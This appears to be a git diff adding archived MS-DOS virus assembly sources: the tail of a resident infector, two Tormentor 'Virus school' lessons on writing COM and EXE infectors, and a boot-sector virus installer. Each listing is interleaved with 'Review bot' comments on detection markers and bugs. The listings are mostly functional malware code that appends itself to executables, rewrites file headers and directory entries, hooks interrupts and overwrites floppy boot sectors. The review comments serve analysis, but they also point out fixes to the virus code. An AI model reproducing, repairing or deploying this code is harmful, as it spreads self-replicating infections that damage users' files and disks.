+ mov ah,3fh ; Read the first three
+ mov cx,3 ; bytes to our temporal
+ lea dx,header_store ; header store
+ call int_21h
+
+ mov ax,word ptr es:[di+11h] ; File lenght in AX
+ cmp ax,0ea60h ; Too big file?
+ ja close_and_pop
+
+ push ax ; Lseek to the end of
+ call lseek_end ; the file
+
+ mov ah,40h ; Append our k-r4d
+ mov cx,torero_size ; code :)
+ lea dx,torero_start
+ call int_21h
+
+ pop ax ; Make the jmp to
+ sub ax,3 ; our virus body
+ mov word ptr cs:[com_header+1],ax ; for the new file
+ call set_marker
+
+ call lseek_start ; Lseek to the start
+
+ mov ah,40h ; Write the new header
+ mov cx,3 ; in so we'll be always
+ lea dx,com_header ; executed first ;P
+ call int_21h
+
+ mov ax,word ptr es:[di+11h] ; Actual size in AX
+ sub ax,3 ; Lseek to the position
+ call lseek_end ; of the original header
+
+ mov ah,40h ; Destroy all the info,
+ mov cx,3 ; already stored in the
+ lea dx,garbage ; directory entry };)
+ call int_21h
+
+close_and_pop: mov ah,3eh ; Close the file
+ call int_21h
+
+ call reset_int_24h ; Reset int 24h
+
+ pop es ds di si ; And pop out all the
+ pop dx cx bx ax ; shit we pushed b4
+ popf
+ ret
+
+; Ĵ Call to the original int 13h
+
+int_13h: pushf
+ call dword ptr cs:[old_int_13h] ; Call the original
+ ret ; int 13h
+
+; Ĵ Call to the original int 21h
+
+int_21h: pushf
+ call dword ptr cs:[old_int_21h] ; Call the original
+ ret ; int 21h
+
+; Ĵ Get SFT in ES:DI
+
+get_sft: push ax bx
+ mov ax,1220h ; Get job file table
+ int 2fh ; in ES:DI (DOS 3+)
+ jc bad_sft
+
+ xor bx,bx ; Get the address of
+ mov ax,1216h ; the specific SFT for
+ mov bl,byte ptr es:[di] ; our handle
+ int 2fh
+
+bad_sft: pop bx ax ; Pop registers and
+ ret ; return to the code
+
+; Ĵ Check our infection mark
+
+check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min.
+ ret ; value of our mark
+
+; Ĵ Read the directory entry
+
+read_entry: push ax bx cx
+ call parameters ; Load the sector
+ int 25h
+
+ pop cx cx bx ax
+ ret
+
+; Ĵ Sector loading
+
+parameters: mov ax,word ptr es:[di+1bh] ; Load the sector
+ mov word ptr cs:[control_block],ax ; number in our
+ mov ax,word ptr es:[di+1dh] ; control block
+ mov word ptr cs:[control_block+2],ax ; Read a long
+ mov cx,0ffffh ; sector, 4 bytes
+
+ push cs ; CS=DS
+ pop ds
+
+ mov word ptr cs:[control_block+4],1 ; One sector
+ mov word ptr cs:[control_block+6],offset sector
+ mov word ptr cs:[control_block+8],cs
+ lea bx,control_block ; Control block
+
+ push ds si
+ lds si,dword ptr es:[di+7] ; Point to the
+ lodsb ; DPB
+ pop si ds
+ ret
+
+; Ĵ Point to the original header
+
+point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry
+ xor ah,ah
+
+ push cx
+ mov cl,5 ; Multiply it*20h
+ shl ax,cl
+ pop cx
+
+ lea si,sector ; Calculate its offset
+ add si,ax ; into the sector and
+ add si,0ch ; move to si+0ch (header)
+ ret
+
+; Ĵ Set int 24h
+
+set_int_24h: push ax si di
+ push ds es
+
+ xor ax,ax ; Point to the IVT
+ mov ds,ax
+
+ push cs ; CS=ES
+ pop es
+
+ mov si,24h*4 ; Save the original int
+ mov di,offset old_int_24h ; 24h address and set
+ cld ; ours l8r
+ movsw
+ movsw
+
+ mov word ptr [si-4],offset new_int_24h
+ mov word ptr [si-2],cs
+
+ pop es ds
+ pop di si ax
+ ret
+
+; Ĵ Restore int 24h
+
+reset_int_24h: push ax si di
+ push ds es
+
+ xor ax,ax ; Point to the IVT
+ mov es,ax
+
+ push cs ; CS=DS
+ pop ds
+
+ mov si,offset old_int_24h ; Restore the original
+ mov di,24h*4 ; int 24h address
+ cld
+ movsw
+ movsw
+
+ pop es ds
+ pop di si ax
+ ret
+
+; Ĵ Torero's int 24h handler
+
+new_int_24h: mov al,3 ; Pass the error code
+ iret
+
+old_int_24h: dw ?,? ; Original int 24h
+
+; Ĵ Set our infection mark
+
+set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8
+ ret
+
+; Ĵ Lseek to the start of the file
+
+lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0
+ ret
+
+; Ĵ Lseek to the end of the file
+
+lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file
+ ret ; length (EOF)
+
+; Ĵ Open the host we're being executed from
+
+open_host: mov ah,62h ; Get PSP address
+ int 21h
+
+ push es
+ mov ds,bx
+ mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment
+ mov es,bx
+ xor di,di
+
+ mov al,1 ; Look for 01h (the
+ mov cx,0ffffh ; mark which sepparates
+ repnz scasb ; the path from the
+ jnz emergency ; name of the file that
+ ; is being executed)
+ xor al,al
+ scasb
+
+ push es
+ pop ds es
+
+ mov ah,3dh ; Open the host
+ mov dx,di
+ call int_21h
+ xchg bx,ax ; Pass handle to BX
+ ret ; and return
+
+; Ĵ Emergency routine... data lost!
+
+emergency: push cs ; CS=DS
+ pop ds
+
+ mov ah,9 ; Show the message...
+ lea dx,windows ; This programs requires
+ int 21h ; Microsoft Windows
+
+ mov ax,4c01h ; Errorlevel=01 :)
+ int 21h
+
+; Ĵ Data area
+
+sector db 200h dup (?) ; The long sector
+
+control_block dd ? ; Control block
+ dw ?
+garbage dd ?
+ db ';)'
+
+windows db 'This program requires Microsoft Windows.'
+ db 0dh,0ah,'$'
+
+action db ? ; Reading or writing?
+infecting db ?
+
+com_header db 0e9h,?,? ; The COM header
+header_store db 3 dup (?) ; Temporal header store
+
+torero_end label byte
+
+torero ends
+ end torero_start
diff --git a/MSDOS/Virus.MSDOS.Unknown.torm-205.asm b/MSDOS/Virus.MSDOS.Unknown.torm-205.asm
new file mode 100644
index 00000000..0cd988f8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.torm-205.asm
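Review bot: The saved header is written into the directory entry at offsets 0Ch–0Fh (`mov word ptr es:[bx+0ch],ax` / `mov word ptr es:[bx+0eh],ax` under `subtract:`), which the header comment calls "ten free unused bytes", but on later FAT implementations those bytes are assigned (NT case flags and creation time, as I recall — check the FAT specification), so a filesystem driver can overwrite them and the host then falls into `emergency` even though the file was never copied or compressed. The author documents only the copy/compress case, so I would add at the `subtract:` store: `; NOTE: entry+0Ch..0Fh are reserved only in the original FAT layout; VFAT-era drivers use them and will clobber this`. Two other analyst-relevant behaviours deserve a comment rather than the jokes they carry: `new_attribute` turns every `ax=4301h` (set attributes) call system-wide into a `get DOS version` no-op while the virus is resident, and `check_mark`/`set_marker` treat an attribute byte of 80h or above in the SFT (`es:[di+4]`) as the infection mark, which is also the simplest detection and cleanup criterion for this sample.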
@@ -0,0 +1,158 @@
+;
+; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
+;
+; This is the first lession on how to make an own virus.
+; Hope you'll learn something of it...
+; To be compiled with TASM 3.0 or higher.
+;
+; This virus is quite dumb and 'noisy'
+; It updates the filedate and time, changes DTA before execution causing
+; some progs to belive they are executed with parameters...
+; But this should only be a 'raw' virus that you can develop.
+; Certain program may hang, so i recommend you not to spread to geeks
+; since there is MANY better viruses to use for such nice purpose.
+;
+; If you want to conntact me or other virus-writers call me on my board:
+; Swedish Virus Laboratory +46-3191-9393
+;
+; Greetings to All virus-writers!
+;
+
+
+ .model tiny
+ .radix 16
+ .code
+
+Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
+
+ org 100
+
+dummy_code: db 'M' ; Mark file as infected.
+ db 3 DUP(90) ; This is to simulate a infected prog.
+ ; Not included in virus-code.
+
+Virus_Start: call where_we_are ; Now we call the next bytes, just to
+ ; know what address virus lies on.
+where_we_are: pop si ; Since the virus-code's address will
+ ; differ from victim to victim.
+ ; a POP SI after a call will give us the
+ ; address which equals to 'where_we_are'
+ ; Very important.
+
+;-----------------------------------------------------------------------
+; Now we have to put back the original 4 bytes in the host program, so
+; we can return control to it later:
+
+ add si,_4first_bytes-where_we_are
+ mov di,100
+ cld
+ movsw
+ movsw
+
+;------------------------------------------------------------------------
+
+; We have to use SI as a reference since files differ in size thus making
+; virus to be located at different addresses.
+
+ sub si,_4first_bytes-Virus_Start+4
+
+;------------------------------------------------------------------------
+; Now we just have to find victims, we will look for ALL .COM files in
+; the current directory.
+
+ mov ah,4e ; We start to look for a *.COM file
+look4victim: mov dx,offset file_match-Virus_Start
+ add dx,si
+ int 21
+
+ jc no_victim_found ; If no *.COM files was found.
+
+ mov ax,3d02 ; Now we open the file.
+ mov dx,9e ; The found victims name is at ds:009e
+ int 21 ; in DTA.
+
+ jc cant_open_file ; If file couldn't be open.
+
+ xchg ax,bx ; Save filehandle in bx
+; (we could use MOV BX,AX but we saves one byte by using xchg )
+
+ mov ah,3f ; Now we read the first 4 bytes
+ mov cx,4 ; from the victim -> buffer
+
+ mov dx,offset _4first_bytes-Virus_Start
+ add dx,si
+ ; We will then overwrite them with
+ int 21 ; a JMP XXXX to virus-code at end.
+
+ jc read_error
+
+ cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
+ jz sick_or_EXE ; Check if infected OR *.EXE
+; Almost all EXE files starts with 'M' and we mark the infected files by
+; starting with 'M' which equals to DEC BP
+; Now we just have to have one check instead of 2 (infected and *.EXE)
+
+ mov ax,4202 ; Position file-pointer to point at
+ xor cx,cx ; End-of-File.
+ xor dx,dx ; Any writing to file will now APPEND it
+ int 21 ; Returns AX -> at end.
+
+ sub ax,4 ; Just for the JMP structure.
+
+ mov word ptr ds:[_4new_bytes+2],ax
+ ; Build new JMP XXXX to virus.
+ ; ( logic: JMP AX )
+
+ mov ah,40 ; Append file with virus code.
+ mov cx,offset Virus_Lenght
+ ; File-size will increase with
+ mov dx,si ; Virus_Lenght.
+ int 21
+
+ jc write_error
+
+ mov ax,4200 ; Position file-pointer to begin of file
+ xor cx,cx ; So we can change the first 3 bytes
+ xor dx,dx ; to JMP to virus.
+ int 21
+
+ mov ah,40 ; Write new 3 bytes.
+ mov cx,4 ; After this, executing the file will
+ mov dx,offset _4new_bytes-Virus_Start
+ add dx,si
+ ; result in virus-code executing before
+ int 21 ; original code.
+ ; (And more files will be infected)
+
+ jc write_error
+
+ mov ah,3e ; Close file, now file is infected.
+ int 21 ; Dos function 3E (close handle)
+
+Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
+ jmp look4victim ; find another victim...
+
+write_error: ; Here you can test whats went wrong.
+read_error: ; This is just for debugging purpose.
+cant_open_file: ; These entries are equal to eachother
+no_victim_found: ; but could be changed if you need to test something.
+
+ mov ax,100 ; Every thing is put back in memory,
+ push ax ; lets us RET back to start of program
+ ret ; and execute the original program.
+
+notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
+ db ' / Demoralized Youth / '
+
+file_match db '*.COM',0 ; Pattern to search for.
+ ; Don't forget to end with 0 !
+
+_4first_bytes: ret ; Here we save the 4 first org. bytes
+ db 3 DUP(0)
+; We have a ret here since this file isn't a REAL infection.
+
+_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
+ ; so our virus-code will be run first.
+Virus_End EQU $
+
+ end dummy_code
diff --git a/MSDOS/Virus.MSDOS.Unknown.torm-358.asm b/MSDOS/Virus.MSDOS.Unknown.torm-358.asm
new file mode 100644
index 00000000..1040c1f6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.torm-358.asm
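Review bot: The store `mov word ptr ds:[_4new_bytes+2],ax` that patches the jump displacement uses the assemble-time absolute address, while every other data reference in this block is made SI-relative with `offset X-Virus_Start` plus `add dx,si` (the file's own comment: "We have to use SI as a reference"), so once the code runs at any address other than the one it was assembled at, that write lands outside the relocated copy and the four bytes written to the victim are whatever `_4new_bytes` already held. As I read the arithmetic, `sub si,_4first_bytes-Virus_Start+4` also leaves SI at `Virus_Start-4` (the `'M'` marker byte) while the `-Virus_Start` references assume SI equals `Virus_Start`, which is worth verifying before anyone treats this "lesson" as a working sample. Since this is an archival listing I would only flag it in place: `; NOTE: absolute address, not SI-relative like the other data references in this routine` on the `_4new_bytes+2` line.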
@@ -0,0 +1,160 @@
+;
+; Virus Lession #2 'How to make a non-resident EXE infector'
+;
+; (c) 1992 Tormentor // Demoralized Youth
+;
+; Well, I had not time to comment this code as much as I wanted to,
+; but here you are.
+; What can be hard to understand is the .EXE header changes, but if
+; you look at the description on the header (ex: Norton guide Tech. Ref)
+; you'll understand...
+; Anyway, feel free to use this example and if you have any questions
+; or anything call my board: Swedish Virus Labratory +46-3191-9393
+;
+; Greetings to all virus-writers!
+;
+; /Tormentor
+;
+
+
+
+ .model tiny
+ .radix 16
+ .code
+
+Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
+
+ org 100
+
+Virus_Start: call where_we_are
+
+where_we_are: pop si
+
+ sub si,where_we_are-Virus_Start
+
+ mov ax,es
+ add ax,10
+ add ax,cs:[si+Exe_header-Virus_Start+16]
+ push ax
+ push cs:[si+Exe_header-Virus_Start+14]
+
+ push ds
+ push cs
+ pop ds
+
+ mov ah,1a
+ mov dx,offset Own_dta-Virus_Start
+ add dx,si
+ int 21
+
+ mov ah,4e ; We start to look for a *.EXE file
+look4victim: mov dx,offset file_match-Virus_Start
+ add dx,si
+ int 21
+
+ jnc cont2
+ jmp no_victim_found ; If no *.EXE files was found.
+
+cont2: mov ax,3d02
+ mov dx,Own_dta-Virus_Start+1e
+ add dx,si
+ int 21
+
+ jnc cont1
+ jmp cant_open_file
+
+cont1: xchg ax,bx
+
+ mov ah,3f
+ mov cx,1c
+ mov dx,offset Exe_header-Virus_Start
+ add dx,si
+ int 21
+
+ jc read_error
+
+ cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
+ jnz no_exe ; !!! Some EXEs starts with ZM !!!
+ cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
+ jz infected
+
+ mov ax,4202 ; Go EOF
+ xor cx,cx
+ xor dx,dx
+ int 21
+
+ push dx
+ push ax
+
+ mov ah,40 ; Write virus to EOF.
+ mov cx,Virus_Lenght
+ mov dx,si
+ int 21
+
+ mov ax,4202 ; Get NEW filelenght.
+ xor cx,cx
+ xor dx,dx
+ int 21
+
+ mov cx,200
+ div cx
+ inc ax
+ mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
+ mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
+
+ pop ax
+ pop dx
+
+ mov cx,10
+ div cx
+ sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
+ mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
+ mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
+
+ mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
+
+ mov ax,4200 ; Position file-pointer to begin of file
+ xor cx,cx
+ xor dx,dx
+ int 21
+
+ mov ah,40 ; Write header
+ mov cx,1c
+ mov dx,offset Exe_header-Virus_Start
+ add dx,si
+ int 21
+
+ jc write_error
+
+no_exe:
+infected:
+ mov ah,3e
+ int 21
+
+Sick_or_EXE: mov ah,4f
+ jmp look4victim
+
+write_error: ; Here you can test whats went wrong.
+read_error: ; This is just for debugging purpose.
+cant_open_file: ; These entries are equal to eachother
+no_victim_found: ; but could be changed if you need to test something.
+
+ pop ds
+ retf
+
+file_match db '*.EXE',0 ; Pattern to search for.
+ ; Don't forget to end with 0 !
+
+Exe_header db 16 DUP(0)
+ dw 0fff0 ; Adjustment just for this COM-file.
+ db 4 DUP(0)
+
+notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
+ db 'Rather first in hell, than second in heaven.'
+
+Own_Dta db 02bh DUP(0)
+
+Virus_End EQU $
+
+ end Virus_Start
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.torment.asm b/MSDOS/Virus.MSDOS.Unknown.torment.asm
new file mode 100644
index 00000000..956c8c20
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.torment.asm
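Review bot: The infection marker is the word `'DY'` placed at EXE header offset 12h (`mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'`, tested by the `cmp ... +12],'DY'` before `jz infected`), i.e. the header checksum field, but nothing in the listing names that field. I would add `; hdr+12h = checksum field, reused as the infection marker 'DY'` on the `cmp` line, since that word is the cheapest identification and scan criterion for this sample. Note also that the `'M'` test only rejects files whose first byte is not `'M'` — as the comment says, `ZM` executables are skipped, and the `'Z'` is never checked — and that on the `jc read_error` / `jc write_error` paths the handle in BX is left open, because those labels fall straight through to `pop ds` / `retf`.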
@@ -0,0 +1,543 @@ +code_seg segment + assume cs:code_seg,ds:code_seg + + org 100h + +tormentor proc far + +@disp macro string + mov dx,offset string + mov ah,09h + int 21h +endm + +@exit macro + mov ax,4c00h + int 21h +endm + +@cls macro mode + mov ah,00h + mov al,mode + int 10h +endm + +start: jmp main + +boot_area dw 256 dup (0) +boot_sec dw 512 dup (0) + +message db "Tormentor Strain A",13,10 + db "Written by The High Evolutionary",13,10 + db "Copyright (C) 1991 by The RABID Nat'nl Development Corp." + db 13,10,13,10 + db "Press any key to install onto media in drive A:",13,10 + db "(Or press CTRL-C to abort)$",13,10 + +paused db 13,10,13,10 + db "[Paused] Insert destination disk if desired and press",13,10 + db "any key, otherwise, press any key$",13,10 + +done db "Done!$",13,10 + +r_fail db 13,10,13,10 + db "Failed to READ in boot sector$",13,10 + +w_fail db 13,10,13,10 + db "Failed to WRITE boot sector$",13,10 + +f_infec db 13,10,13,10 + db "SHIT! We failed to write the virus code to the disk!!!$",13,10 + +r_boot db 13,10,13,10 + db "Now READING in the boot sector$",13,10 + +w_boot db 13,10,13,10 + db "Now WRITING the boot sector to track 719$",13,10 + +w_vir db 13,10,13,10 + db "Now WRITING the VIRUS to the boot sector$",13,10 + +succ db 13,10,13,10 + db "Success! We installed Tormentor onto the drive$",13,10 + +memerr db 13,10,13,10 + db "BOMB! We had a memory allocation error. Bailing out...$",13,10 + db 13,10 + +read_shit db 13,10,13,10 + db "Reading in shit via INT 25...$",13,10 + db 13,10 + +intro db "You are in Torment$",13,10 + +bootseg dw ? ; Storage segment address or mem. block + ; containing copy of boot record + +dssave dw ? ; Storage for DS register +;dssave dw seg group ; Storage for DS register + +pspseg dw ? 
; PSP segment storage + +;stack segment para stack 'STACK' ; Code Segment +;stack ends + +;_data segment word public 'DATA' ; Data Segment +;_data ends + +;dgroup group data,stack ; Define segment group + +;***************************************************************************** +; Boot record information to infect both floppies and hard-drives +;***************************************************************************** + +bootrecord struc +bootjump db 3 dup (?) ; Initial 3 byte jmp instruction +oemstring db 8 dup (?) ; OEM version and DOS +sectorbytes dw ? ; Bytes per sector +clustersec db ? ; Sectors per cluster +reservedrec dw ? ; Reserved sectors +fatcopies db ? ; number of FAT copies +direntries dw ? ; number of root dir entries +totalsectors dw ? ; Total disk sectors +mediadescrip db ? ; Media Descriptor +fatsectors dw ? ; number of sectors occupied by 1 FAT +tracksectors dw ? ; number of sectors per track +heads dw ? ; number of heads +hiddensectors dw ? ; number of hidden sectors +bootrecord ends + +drive db ? ; Current drive pointer + +memalloc proc near + + push bp ; Save base pointer + push bx ; Save BX + mov bp,sp ; init base pointer + xor al,al ; Zero out AL + mov ah,48h ; Allocate mem. function + int 21h + jnc end_memalloc ; exit if no error + mov word ptr [bp],bx + +end_memalloc: + pop bx ; Restore BX + pop bp ; Restore Base Pointer + ret + +memalloc endp + +main: + +get_default_drive: + mov ah,19h + int 21h + mov byte ptr drive,al ; Move current drive into drive + + +; mov ds,dssave ; Initialise DS +; mov ax,es ; get PSP address +; mov word ptr pspseg,ax ; and save it... 
+ + jmp read_boot + +; mov bx,40h ; Allocate 1024 bytes +; call memalloc ; Allocate BX block of memory +; jnc read_boot +; @disp memerr +; jmp quit + +read_boot: + @disp read_shit + mov ah,08h + int 21h + mov word ptr bootseg,ax + push ax ; Save AX onto the stack + mov al,0 +; mov al,byte ptr drive ; Move current drive into AL + xor ah,ah ; Zero out AH +; pop ds ; Restore Data_seg + pushf ; Save flags + mov dx,0 ; Read in sector 0 + mov cx,1 ; Read in 1 sector + mov bx,offset boot_sec ; Store data at DS:boot_sec + int 25h ; Read in the disk + popf ; clear flags used by flags + @disp done + mov ah,08h + int 21h +; assume ds:code_seg ; Restore DS + +begin: @cls 03 +; mov ah,00 ; Set screen +; mov al,03 ; Set screen for 80x25 color +; int 10h ; Call BIOS + @disp message + + mov ah,08h ; Wait for a keypress + int 21h + mov cx,3 + +read_sector: + @disp r_boot ; Display that we are reading the + ; sector from the disk + push cx ; Counter is pushed onto the stack + mov ax,201h ; Read in 1 sector + mov bx,offset boot_area ; Store it in boot_area + mov cx,1 ; Set counter to 1 + mov dx,0 ; Set for drive 0, head 0 + int 13h ; Call BIOS + pop cx ; Restore counter + jnc good_read ; If there were no errors, then + ; jump to good_read + loop read_sector ; Jump back and try reading the sector + ; again while CX>0 + @disp r_fail + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_read: + mov cx,3 ; Set counter to 3 + @disp paused ; Display message for pause + mov ah,08h ; Wait for a key + int 21h ; Call DOS + +;***************************************************************************** +; Write good sector to track 719 (Head 1, track 27, sector 9) +;***************************************************************************** + +write_sector: + @disp w_boot ; Display that we are writing the + ; sector to disk + mov ax,301h ; Set for writing the boot sector + mov bx,offset boot_area ; Set buffer to what we read in +; mov bx,offset infected_data + mov cx,2709h ; Set counter to 2709h 
+ mov dx,100h ; Head 1, drive 0 + int 13h ; Call BIOS + pop cx ; Restore the counter + jnc good_write ; If we wrote the sectors allright, + ; then jump to good_write + loop write_sector + @disp w_fail + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_write: + mov cx,3 ; Copy 3 into CX + @disp w_vir +infect_floppy: + push cx ; Push it onto the stack + mov ax,301h ; Write 1 sector + mov bx,offset infected_data ; Write corrupt boot sector to the + ; drive + mov cx,1 ; Set counter to 1 + mov dx,0 ; Set for drive A: + int 13h ; Call BIOS + jnc good_infection ; If there are no problems, then + ; continue + loop infect_floppy ; Otherwise, try again until CX=0 + @disp f_infec ; If CX=0, then display the message + ; and then exit + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_infection: + @disp succ + mov ax,4c00h + int 21h + +;***************************************************************************** +; The following is a copy of the infected boot sector to copy to sector 0 +;***************************************************************************** + +infected_data db 0EBh, 34h + nop + dec cx + inc dx + dec bp + and [bx+si],ah + xor bp,word ptr ds:[33h] + add al,[bp+si] + add [bx+si],ax + add dh,[bx+si+0] + rol byte ptr [bp+si],1 ; Rotate + std ; Set direction flag + add al,[bx+si] + or [bx+si],ax + add al,[bx+si] + db 19 dup (0) +; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' 
+ adc al,[bx+si] + add [bx+si],al + add [bx+di],al + add dl,bh + xor ax,ax ; Zero register + mov ds,ax + mov ss,ax + mov bx,7C00h ; Pointer to boot segment + mov sp,bx + push ds +data_14 db 53h + dec word ptr ds:[413h] + int 12h ; Put (memory size)/1K in ax + mov cl,6 + shl ax,cl ; Shift w/zeros fill + mov es,ax + xchg ax,word ptr ds:[4Eh] + mov word ptr ds:[7DABh],ax + mov ax,128h + xchg ax,word ptr ds:[4Ch] + mov word ptr ds:[7DA9h],ax + mov ax,es + xchg ax,word ptr ds:[66h] + mov word ptr ds:[7DAFh],ax + mov ax,0BBh + xchg ax,word ptr ds:[64h] + mov word ptr ds:[7DADh],ax + xor di,di ; Zero register + mov si,bx + mov cx,100h + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + sti ; Enable interrupts + push es + mov ax,85h + push ax + retf + push bx + xor dl,dl ; Zero register + call sub_2 ; (00FB) + pop bx + push ds + pop es + mov ah,2 + mov dh,1 + call sub_6 ; (011F) + jc loc_2 ; Jump if carry Set + push cs + pop ds + mov si,offset ds:[0Bh] + mov di,offset ds:[7C0Bh] + mov cx,2Bh + cld ; Clear direction + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_ret_3 ; Jump if zero +loc_2: + pop bx + pop ax + push cs + mov ax,0AFh + push ax + +loc_ret_3: + retf ; Return far +read_error: + push cs + pop ds + mov si,1DBh + call sub_1 ; (00DA) + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + xor ax,ax ; Zero register + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + push cs + pop es + mov bx,offset ds:[200h] + mov cx,6 + xor dx,dx ; Zero register + mov ax,201h + int 13h ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + jc read_error ; Jump if carry Set + mov cx,0FF0h + mov ds,cx + jmp dword ptr cs:data_16 + +; +; Insert Tormentor endp here... +; +;tormentor endp + + +; +; SUBROUTINE +; + +sub_1 proc near +loc_5: + mov bx,7 + cld ; Clear direction + lodsb ; String [si] to al + or al,al ; Zero ? 
+ jz loc_ret_9 ; Jump if zero + jns loc_6 ; Jump if not sign + xor al,0D7h + or bl,88h +loc_6: + cmp al,20h + jbe loc_7 ; Jump if below or = + mov cx,1 + mov ah,9 ; + int 10h ; Video display ah=functn 09h + ; set char al & attrib bl @curs +loc_7: + mov ah,0Eh + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_5 ; (00DA) + +; External Entry into Subroutine + +sub_2: + mov bx,200h + mov cx,2 + mov ah,cl + call sub_5 ; (011D) + mov cx,2709h + xor byte ptr es:[bx],0FDh + jz loc_8 ; Jump if zero + mov cx,4F0Fh +loc_8: + jmp short loc_ret_9 ; (0127) + nop + +; External Entry into Subroutine + +sub_3: + mov ah,2 + mov bx,200h + +; External Entry into Subroutine + +sub_4: + mov cx,1 + +; External Entry into Subroutine + +sub_5: + mov dh,0 + +; External Entry into Subroutine + +sub_6: + mov al,1 + +; External Entry into Subroutine + +sub_7: + pushf ; Push flags + call dword ptr cs:data_15 + +loc_ret_9: + retn +sub_1 endp + + push ax + push bx + push cx + push dx + push es + push ds + push si + push di + pushf ; Push flags + push cs + pop ds + cmp dl,1 + ja loc_11 ; Jump if above + and ax,0FE00h + jz loc_11 ; Jump if zero + xchg al,ch + shl al,1 ; Shift w/zeros fill + add al,dh + mov ah,9 + mul ah ; ax = reg * al + add ax,cx + sub al,6 + cmp ax,6 + ja loc_11 ; Jump if above + push cs + pop es + call sub_3 ; (0115) + jc loc_10 ; Jump if carry Set + mov di,offset data_14 + mov si,offset ds:[243h] + mov cx,0Eh + std ; Set direction flag + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to + ; es:[di] + jz loc_11 ; Jump if zero + sub si,cx + sub di,cx + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to + ; es:[di] + call sub_2 ; (00FB) + push cx + push bx + call sub_3 ; (0115) + mov ah,3 + xor bx,bx ; Zero register + call sub_4 ; (011A) + pop bx + pop cx + jc loc_10 ; Jump if carry Set + mov dh,1 + mov ah,3 + call sub_6 ; (011F) +loc_10: + xor ax,ax ; Zero register + call sub_7 ; (0121) +loc_11: + mov ah,4 + int 1Ah ; Real time clock ah=func 
04h + ; read date cx=year, dx=mon/day + cmp dh,9 + jne not_month ; Jump if not equal + mov si,1B1h + call sub_1 ; (00DA) +not_month: + popf ; Pop flags + pop di + pop si + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + jmp dword ptr cs:data_15 +data_15 dd 0C602EC59h +data_16 dd 0F000E6F2h + esc 2,ch ; coprocessor escape + and [bp+di-4141h],al + movsb ; Mov [si] to es:[di] + idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data + xchg ax,si + mov si,offset ds:[0B4A5h] + mov ax,0DAA7h + esc 5,[bx+si] ; coprocessor escape + db 'IO SYSMSDOS SYS', 0Dh, 0Ah + db 'Non-system disk or disk error', 0Dh + db 0Ah + add [bx+si],al + push bp +; jmp cont + +; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' + stosb +;cont: stosb ; Store al to es:[di] + +tormentor endp + +quit: mov ax,4c00h + int 21h + + + code_seg ends +end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.totoro.asm b/MSDOS/Virus.MSDOS.Unknown.totoro.asm new file mode 100644 index 00000000..b3dc86ab --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.totoro.asm 
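Review bot: At `write_sector:` the `pop cx` has no matching `push cx` — the `read_sector` loop above is balanced and `good_read:` reloads CX with 3 without pushing — so the retry path `loop write_sector` pops whatever the installer left on the stack earlier (the `push ax` in `read_boot` is never popped, and the `pushf`/`popf` pair around `int 25h` appears to leave one extra word if INT 25h deposits its own flags word as documented), and a failed backup write corrupts the installer's stack instead of retrying; worth a comment at that line, `; BUG: no push cx before this loop; a failed write pops unrelated stack words`. The comment on `mov cx,2709h` ('Set counter to 2709h') is misleading: for INT 13h/03h CX is cylinder/sector, i.e. cylinder 27h, sector 9, with head 1 from `mov dx,100h`, which matches the section header 'track 719'; change it to `; CH=27h cyl, CL=09h sector, head 1: last sector of a 360 KB floppy (logical 719)`. The embedded boot code's `sub_2` seems to choose the same location (CX=2709h) or 4F0Fh depending on whether the byte it reads from sector 2 xor 0FDh is zero, i.e. the FAT media descriptor, which is where an incident responder would look for the original boot sector when restoring a disk — hedged, since `sub_2` only reaches the disk through the raw vector stored at `data_15`. The `cmp dh,9` after `int 1Ah` (AH=4, DH=month) is the payload trigger for September and the `mov si,1B1h` points at the text block printed by `sub_1`; a one-line comment `; September: print text at 1B1h via sub_1` would make the trigger findable without tracing the date call.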
